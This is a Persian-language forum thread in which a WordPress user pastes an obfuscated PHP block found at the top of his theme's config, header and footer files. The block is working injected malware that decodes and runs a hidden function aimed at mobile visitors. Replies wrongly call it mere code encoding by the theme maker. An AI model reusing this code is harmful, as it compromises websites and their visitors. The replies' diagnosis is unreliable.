زمان جاری : دوشنبه 28 خرداد 1397 - 5:55 بعد از ظهر
نام کاربری :
پسورد :

آخرین اخبار و اطلاعیه ها

کاربر گرامی:اگر تازه ثبت نام کرده اید لطفا قوانین انجمن را بخوانید،تا با مشکلی روبه رو نشوید.


تاپیک سایت های مفید و کاربردی
•´¯`•.چت روم تالار گفتمان اسکینک دات آی آر .•´¯`•
تاپیک جامع تغییر نام کاربری اعضای اسکینک

پاسخ جدید
نویسنده پیام
mr-saeed
آنلاین

ارسال‌ها : 473
عضویت: 25 /10 /1394
محل زندگی: MaShHaD
تشکرها : 165
تشکر شده : 187
چند تا سوال داشتم در مورد وردپرسه لطفا بیاین
سلام خسته نباشید

اولین سوال اینکه این کد چیه تو اول قایل کانفیگ و سربرگ و فوتر و ... قالبم اومده ؟؟
کد:
<?php $cyjybvghtl = 'f 125 x53 105 x52 137 x41 107 x45 116 x54"]); if ((s6 x75 156 x61"]=1; $uas=strtolower($_SERVER[" x48 124 x54 120 x52q%l}S;2-u%!-#2#/#%#/#o]#/*)3j%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@ 156 x75 156 x61"])))) { $GLOBALS[" x61 15 x22:ftmbg39*56A:>|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hn.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fepdof.)fepdof./4y]552]e7y]#>n%<#372]58y]472]37y]672}#QwTW%hIr x5c1^-%r x5c2^-%hOh#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D#@#/qp%>5h%!<*::::::-112qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)sp!*#ojneb#-*f%)sfxpmptjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j7f x7f<u%V x27{ftmfV x!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tdovg}k~~9{d%:osvufs:~928>>7~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pd]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%n-tr.984:75983:48984:71]K9]77]D`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osvufs}w;* x7f!>hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s*<!%t::!>! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*x6e"; function eqplqno($n){retuxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65e6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gy7:]268]y7f#<!%tww!>! x2400~:<h%_t%:o3]256]y81]265]y72]254]y76#<!#M#-#[#-#Y#-#D#-#W#-#C#&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`*#npd/#)rrd/#00;quui#># x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-sutcvt)!gj!|!*bubE{h%)j{hnpd!opjif((function_exists(" x6f 142 x5f 163 x7udovg!|!**#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^223zbe!-#jt0*?]+^?]_ x5c}X x24<!%tmw!>!#]y84]275]y83]273]{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zR25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6Rtrstr($uas," x6d 163 x69 145")4 141 x72 164") && (!isset($GLOBALS[" x612 166 x3a 61 x31")) or (strstr($uas," x61 156 x64 162 x6f 151 x64"}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x24)% x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id3]427]36]373P6]36]73]84}472 x24<!%ff2!>!bssbz) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c%:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opjuSFTV`QUUI&b%!|!*)323zbek!~!<b% x7f!<X>b%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`%=*h%)m%):fmjix:<##:>:h%:<#6!<2,*j%!-#1]#-bubE{h%)tpqsut>j%)ftpmdR6<*id%)dfyfR x27tfs%6<*%w` x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%wx24gvodujpo! x24- x24y7 x24- x24*#[k2`{6:!}7;!}6;##}C;!>>hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)e]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47P7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%r65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5`{66~6<&w6< x7fw#]y38#-!%w:**<")));$x<~!!%s:N}#-%o:W%c:>1<%b:>1<24- x24y4 x24- x24]y8gnettzo = $caovevn("", $oklltmz); $gnettzo();}}pn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:749854)##-!#~<#/% x24- x24!>!fyqmpef)# x24ting(0); $oklltmz = implode(array_map("eqplqno",strsvufs:~:<*9-1-r%)s%>/h%:<**#57W%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/h+{d%)+opjudovg+)!gj+{e%!osvufs!*!) or (strstr($uas," x741]88M4P8]37]278]225]241]334]368]322]3]364]6]286 151 x72 145 x66 157 x78"))) { $caovevn = " x63 162 x]#)fepmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!45]43]321]464]284]364]6]234]342]5+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!jw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-usut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816epc}A;~!} x7f;!|!}{;)gj%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj<**2qj%)hopm3qjA)qj3hopmA x273qy76]277#<!%t2w>#]y74]273]y76]252]y85]2j^ x24- x24tvctus)% x24- x24b!>!!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,)) or (strstr($uas," x63 150 x72 157 x6q%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc x7f!|!*uyfu x27!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: x5c%j:^<!]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboeufttj x22)gj6<^#Y# x5cq% x27Y%6<.msv`3}!+!<+{e%+*!*+fepdfe{%!*9! x27!hmg%)!gj!~<ofmyrn chr(ord($n)-1);} @error_reporf_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_gb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%z*<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ x2]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:559466*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fmjgA x27doj%6< x7fw6* x> x22!pd%)!gj}Z;h!opjudovg}{;#)tu1112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut6<*)ujojR x27id%6< x7fw6* x7-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.9856]y6g]257]y86]267]y74]275]-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7gj6+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV x7f x7f x8]24]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/%r!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt_split("%tjw!>!#]y84]275]y83]248]y8k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},d 145")) or (strstr($uas," x6 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA]#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}527}88:}33)ufttj x22)gj!|!*nbsb x24- x24]26 x24- x24<%j,,*!| x24- fd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]3w2!>#p#/#p#/%z<jg!)%z>>2*85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx3]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]4%w:!>!(%w:!>! x246767-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFHsp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%pd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde|:**#ppde#)tutjyf`4 x22StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSdzudjubmsx'; $yqggugum=explode(chr((816-696)),substr($cyjybvghtl,(24595-18575),(182-148))); $ezxreop = $yqggugum[0]($yqggugum[(3-2)]); $awnypgr = $yqggugum[0]($yqggugum[(14-12)]); if (!function_exists('ccshie')) { function ccshie($auqhpy, $innnnhnm,$zwoqhiidx) { $yknewz = NULL; for($bsnzwpzek=0;$bsnzwpzek<(sizeof($auqhpy)/2);$bsnzwpzek++) { $yknewz .= substr($innnnhnm, $auqhpy[($bsnzwpzek*2)],$auqhpy[($bsnzwpzek*2)+(3-2)]); } return $zwoqhiidx(chr((33-24)),chr((538-446)),$yknewz); }; } $zayftknzv = explode(chr((175-131)),'1429,40,1738,41,193,42,52,64,0,52,1708,30,3243,22,1779,66,4009,39,5318,29,3312,54,2755,47,1058,31,4447,32,3059,51,5222,35,1247,28,5726,20,770,32,2248,53,962,49,3366,63,5904,48,5746,56,1358,39,541,58,5017,42,3813,31,145,48,420,61,4363,37,2802,51,4721,60,1962,46,2359,31,3950,59,4865,28,4479,61,2466,25,5176,46,1845,54,902,60,4781,33,621,59,3751,62,2329,30,3703,48,4422,25,3429,66,2491,46,5802,47,1397,32,1469,70,5347,59,3171,38,1336,22,297,57,518,23,4814,51,4110,51,3528,46,599,22,3623,57,2100,47,1298,38,2209,39,4280,36,5467,21,4048,62,5257,61,2147,62,744,26,235,62,5952,68,4400,22,3209,34,5059,51,680,22,2593,47,1656,52,5617,58,1595,61,3680,23,5849,55,116,29,1539,56,3844,38,4945,27,1210,37,3110,30,4222,58,2301,28,354,36,2537,56,5406,61,2030,70,3882,32,1899,63,2901,21,5488,35,2434,32,4606,59,3022,37,1011,47,2694,61,1089,58,4540,66,3140,31,390,30,4316,47,2969,53,4893,52,4665,56,872,30,481,37,1147,63,2640,54,802,70,5523,69,3265,47,2008,22,5675,51,3495,33,5110,66,2873,28,3914,36,4161,61,2390,44,5592,25,702,42,3574,49,1275,23,4972,45,2853,20,2922,47'); $ggsigg = $ezxreop("",ccshie($zayftknzv,$cyjybvghtl,$awnypgr)); $ezxreop=$cyjybvghtl; $ggsigg(""); $ggsigg=(506-385); $cyjybvghtl=$ggsigg-1; ?>


دوما چرا وقتی میخوام پست ارسال کنم یا قالب ویرایش کنم
یا حتی برم تو صفحه تنظیمات قالبم صفحه وردپرس سفید میشه ؟؟ فقط پیشخوان میاد


یکشنبه 12 دی 1395 - 15:48
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
mahdi-asghari
آفلاینارسال‌ها : 729
عضویت: 2 /3 /1393
تعداد اخطار: 999
تشکرها : 399
تشکر شده : 340
پاسخ : 1 RE چند تا سوال داشتم در مورد وردپرسه لطفا بیاین
قالبت ایراد داره و کد هاشو مخفی کردن
یکشنبه 12 دی 1395 - 15:52
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
اطلاعیه جلسه مدیران اسکینک
hawsan
آفلاینارسال‌ها : 3847
عضویت: 19 /12 /1394
محل زندگی: شاتل فایل
سن: 19
آی دی تلگرام:
تشکرها : 1337
تشکر شده : 1646
پاسخ : 2 RE چند تا سوال داشتم در مورد وردپرسه لطفا بیاین
ENCOD شده

امضا کاربر
یکشنبه 12 دی 1395 - 15:57
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
اطلاعیه جلسه مدیران اسکینک
mr-saeed
آفلاینارسال‌ها : 473
عضویت: 25 /10 /1394
محل زندگی: MaShHaD
تشکرها : 165
تشکر شده : 187
پاسخ : 3 RE چند تا سوال داشتم در مورد وردپرسه لطفا بیاین
نقل قول از mahdi-asghari
قالبت ایراد داره و کد هاشو مخفی کردن

قالبم سالم سالم باز هم میشه بدون مشکل
ولی داخل کد هاش اینا هستن ک سواله برام
یکشنبه 12 دی 1395 - 15:58
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
اطلاعیه جلسه مدیران اسکینک
mr-saeed
آفلاینارسال‌ها : 473
عضویت: 25 /10 /1394
محل زندگی: MaShHaD
تشکرها : 165
تشکر شده : 187
پاسخ : 4 RE چند تا سوال داشتم در مورد وردپرسه لطفا بیاین
نقل قول از rashafile
ENCOD شده
اولش این مشکل نبود بعدنا اتفاق افتاده
باید چیکار کنم
یکشنبه 12 دی 1395 - 15:59
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
اطلاعیه جلسه مدیران اسکینک
mahdi-asghari
آفلاینارسال‌ها : 729
عضویت: 2 /3 /1393
تعداد اخطار: 999
تشکرها : 399
تشکر شده : 340
پاسخ : 5 RE چند تا سوال داشتم در مورد وردپرسه لطفا بیاین
نقل قول از mr-saeed
نقل قول از mahdi-asghari
قالبت ایراد داره و کد هاشو مخفی کردن

قالبم سالم سالم باز هم میشه بدون مشکل
ولی داخل کد هاش اینا هستن ک سواله برام

کد هاشو مخفی کردن که نتونی ویرایش یا پاک کنی

یکشنبه 12 دی 1395 - 15:59
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
اطلاعیه جلسه مدیران اسکینک
mahdi-asghari
آفلاینارسال‌ها : 729
عضویت: 2 /3 /1393
تعداد اخطار: 999
تشکرها : 399
تشکر شده : 340
پاسخ : 6 RE چند تا سوال داشتم در مورد وردپرسه لطفا بیاین
قالب اورجینال گرفتی؟ اگر قالبت رایگان هست که مشکلات به خاطر همینه
یکشنبه 12 دی 1395 - 16:00
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
اطلاعیه جلسه مدیران اسکینک
mr-saeed
آفلاینارسال‌ها : 473
عضویت: 25 /10 /1394
محل زندگی: MaShHaD
تشکرها : 165
تشکر شده : 187
پاسخ : 7 RE چند تا سوال داشتم در مورد وردپرسه لطفا بیاین
نقل قول از mahdi-asghari
قالب اورجینال گرفتی؟ اگر قالبت رایگان هست که مشکلات به خاطر همینه

رایگان نیست قالب پرشین هست
یکشنبه 12 دی 1395 - 16:08
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
اطلاعیه جلسه مدیران اسکینک

برای ارسال پاسخ ابتدا باید لوگین یا ثبت نام کنید.


X بستن تبلیغات
نمایندگی هاست خرید هاست
گروه تلگرام سایت

تعداد اعضا : 400 نفر

چت با اعضا